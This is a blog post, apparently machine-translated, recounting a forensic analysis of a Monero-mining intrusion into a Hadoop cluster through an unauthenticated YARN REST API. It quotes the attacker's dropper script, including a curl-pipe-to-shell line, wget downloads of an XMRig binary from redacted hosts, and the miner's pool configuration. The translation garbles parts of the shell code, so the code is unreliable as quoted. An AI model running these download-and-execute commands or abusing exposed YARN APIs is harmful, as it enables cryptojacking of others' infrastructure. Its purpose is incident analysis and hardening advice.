Forensic analysis of a cryptocurrency mining attack in a Big Data cluster

A few days ago they contacted me to perform a forensic analysis on an intrusion in a Big Data cluster. Apparently they had committed a set of machines and installed cryptocurrency miners in all the nodes of the cluster.

I leave here a review of the activities I did to discover how they agreed and what the pirates did.

Before starting

The first action before getting into flour is to execute a script to recover the maximum information about the volatile data and after unplugging the machines from the stream, it is not convenient to stop the machines in an orderly manner because there are some crackers that leave a running process that in how much they detect the fall of a network interface eliminate all the information of the system.

In that volatile data collection script you have to recover data from the processes that are executed (ps), open files (lsof), network connections (netstat), executed commands (lastcomm), accesses (who) …

Another action to take if you have access to the cluster from the internet is to scan from ports to the public IP.

  nmap -Pn -p1-65535 [Public IP]

Before doing any other type of action, it is necessary to make backup copies of all the storage systems because it is necessary to have an immutable picture of the entire system.

In a first analysis of these data and I find that there is a process that runs on all cluster datanodes that consumes 95% of the CPU, that system administrators have not identified and the owner is the user yarn that is the process manager, memory, CPU of the Hadoop cluster, clear candidate to be a malignant process and very skilled the cracker since any process uploaded to Yarn automatically runs in all nodemanager of the cluster.


  ps -ef | grep yarn
 yarn 46185 1 99 May03 ?  4 - 19 : 04 : 28 / tmp / java - c / tmp / w.conf

The file that was executed no longer exists in the system.

  ls /tmp/java
 ls: can not access / tmp / java: No such file or directory

 ls /tmp/w.conf
 ls: can not access /tmp/w.conf: No such file or directory


I check in the logs the ssh accesses and the history of the yarn user commands. Nothing unusual is appreciated.

 lastcomm -a
 sudo su - yarn 

Checking the yarn logs (/var/log/hadoop-yarn/hadoop-cmf-yarn-RESOURCEMANAGER-XXX.out) are the start and stop logs of these processes.

Open connections

The process is sending data to port 5556 of the server

 netstat -anp |  grep 46185
 tcp 0 0 : 50454 : 5556 ESTABLISHED 46185 / java

 lsof | grep 46185
 java 46185 yarn 10 u IPv4 108035839 0 t0 TCP fmis-altair-vm4: 50454 -> (ESTABLISHED)
 java 46185 yarn txt REG 8 , 2 2359872 2490376 / tmp / java (deleted)

Also in the output of the lsof it is shown that the source file (/ tmp / jav) was deleted.

What the Cloudera Manager says

I check what information there is in the Cloudera Manager and in the YARN console for those dates and there are continuous executions of Yarn processes of short duration that do not finish.

Time-line analysis

With the mac-robber and mactime tool I review the access, modification and executions of all files in the period that the CPU starts to be 95%.

 nohup mac-robber / > timeline_root_20180506.mac && mactime -b timeline_root_20180506.mac> timeline_root_20180506 &

About the file generated by mac-robber I look for the changes and modifications of the user yarn (489) in the problematic periods and I find with accesses to files of state and recovery of yarn J

 grep " 489 " timeline_root_20180506 
 4096 mac .  drwx ------ 489 487 0 / var / lib / hadoop - yarn / yarn - nm - recovery / yarn - nm - state
 300356 .  a .. - rw - r - r - 489 487 0 / var / lib / hadoop - yarn / yarn - nm - recovery / yarn - nm - state / 014436 .  sst
 3885 mac .  - rw - r - r - 489 487 0 / var / lib / hadoop - yarn / yarn - nm - recovery / yarn - nm - state / 014438 .  sst

In those directories, yarn stores the binaries that it executes, so I have the ideal place to search for clues of what has been executed.

The binary

He threw a strings on the binary and I find ugly things.

 strings /var/lib/hadoop-yarn/yarn-nm-recovery/yarn-nm-state/014438.sst
 * $ curl XXX.XXX.XXX.XXX/ |  sh & disown

With that command you are downloading a file on the server.

Let’s see what content it has.


There we have the culprit:

 #! /bin/bash 

 pkill -f cryptonight
 pkill -f sustes
 pkill -f xmrig
 pkill -f xmr-stak
 pkill -f suppoie

 #ps ax | grep /tmp/yarn | grep -v grep | xargs kill -9

 if [!  " $ (ps -fe | grep '/ tmp / java -c /tmp/w.conf' | grep -v grep) " ];  then
 f1 = $ (curl XXX.XXX.XXX.XXX/g.php)
 f2 = "XXX.XXX.XXX.XXY" 
  WGET = " wget " 
  if [-s /usr/bin/curl]; 
  then WGET = " curl -o "; 
  if [-s /usr/bin/wget]; 
  then WGET = " wget -O "; 
  if [`getconf LONG_BIT` =" 64 "] 
  $ WGET /tmp/java http://$f1/xmrig_64 
  $ WGET /tmp/java http://$f1/xmrig_32 

  chmod + x /tmp/java 
  $ WGET /tmp/w.conf http://$f2/w.conf 
  nohup /tmp/java -c /tmp/w.conf >/dev/null 2> & 1 & 
  sleep 5 
  rm -rf /tmp/w.conf 
  rm -f /tmp/java 
  pkill -f logo9.jpg 
  crontab -l | thirst '/logo9/d' | crontab - 

This script the first thing that it does is eliminate the processes of the competition in the mining, wants to have the cluster for the solito.

Then check if it is already running and if so, do not continue.

Then it recovers an IP from which the malware will then be downloaded, possibly because the websites with malware change rapidly and because it will interest you to change IPs from time to time in case the SysAdmin finds it suspicious and denies access.

And finally, it downloads two files, the binary that performs the mining, and changes its name, and the configuration file. Execute the binary and delete the two files.

I also download the w.conf file to continue gossiping.

 curl XXX.XXX.XXX.XXY/w.conf

 "something" : "cryptonight" ,
 "background" : true ,
 "colors" : true ,
 "retries" : 5 ,
 "retry-pause" : 5 ,
 "donate-level" : 1 ,
 "syslog" : false ,
 "log-file" : null ,
 "print-time" : 60 ,
 "av" : 0 ,
 "safe" : false ,
 "max-cpu-usage" : 95 ,
 "cpu-priority" : 4 ,
 "threads" : null ,
 "pools" : [
 "url" : "stratum + tcp: //XXX.XXX.XXX.XYY: 5556" ,
 "user" : "XXX" ,
 "pass" : "XXX" ,
 "keepalive" : true ,
 "nicehash" : false ,
 "variant" : -1
 "api" : {
 "port" : 0 ,
 "access-token" : null ,
 "worker-id" : null

The xmrig file is a miner of the Monero cryptocurrency (XMR) to be more anonymous than Bitcoin (BTC) or Ethereum or others, and the stratum + tcpprotocol is a classic coin virtual

So “our” cracker has made the intrusion to install programs that miner Monero and make money thanks to the reward that gives this currency for the processing it brings to the XMR network.

How did it get into the system?

Known the whole plan of the malware once in the system what interests us to know is how it has been able to sneak inside.

On top of that what we have so far is that in the logs of access logs and executed commands nothing suspicious appears and in the logs of yarn does not indicate how that binary has come to be deployed.

The scanning of ports with the nmap showed us that many ports were being exposed to the internet and that offers a range of attack possibilities. So seeing that I was very lost, I chose to look around.

We prepare a similar cluster, we start it and put a sniffer to store all the network packets.

 tcpdump -i eth0 -s 65535 -n '(not src net' -w /mnt/media/20180506.dump

In less than an hour I already had infectious processes running in the cluster and with the user yarn. I stopped the cluster, I downloaded the dump, I opened it with the wireshark program and proceeded to look for suspicious text strings, which appeared soon.

Port 8088 is the one used by the Yarn Resource Manager Web.

But the request that is being made is about / ws/v1/cluser/apps that accessing the Hadoop documentation tells us that it is a REST API of YARN to handle applications.

Here is the key to how they are managing to register the process, they are using the API of Yarn that is exposed on port 8088, to register the application that is responsible for executing the curl that lowers the malvare and executing it in all the worker nodes of the Big Data cluster.

curl XXX.XXX.XXX.XXX | sh


  • Big Data clusters are very sweet for intruders who want to mine cryptocurrencies because they are composed of multiple nodes and usually have great processing capabilities.
  • You just have to expose the strictly necessary ports abroad, a classic in the world of security.
  • It is necessary to know well the services that are exposed because in this case the WEB UI of Yarn has a double utility on the one hand to monitor and on the other to be an API REST of management applications.
  • It is necessary to secure the daemons and not allow them to be executed with the default permissions, in this case the process is allowed to be registered in yarn without authenticating with the user dr.who.
Initially published on Linkedin and copied on this blog so that it has visibility for non-Linkedin users.

Performed an analysis on an intrusion in Big Data system to mine cryptocurrencies



Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de

Estás comentando usando tu cuenta de Cerrar sesión /  Cambiar )

Google photo

Estás comentando usando tu cuenta de Google. Cerrar sesión /  Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión /  Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión /  Cambiar )

Conectando a %s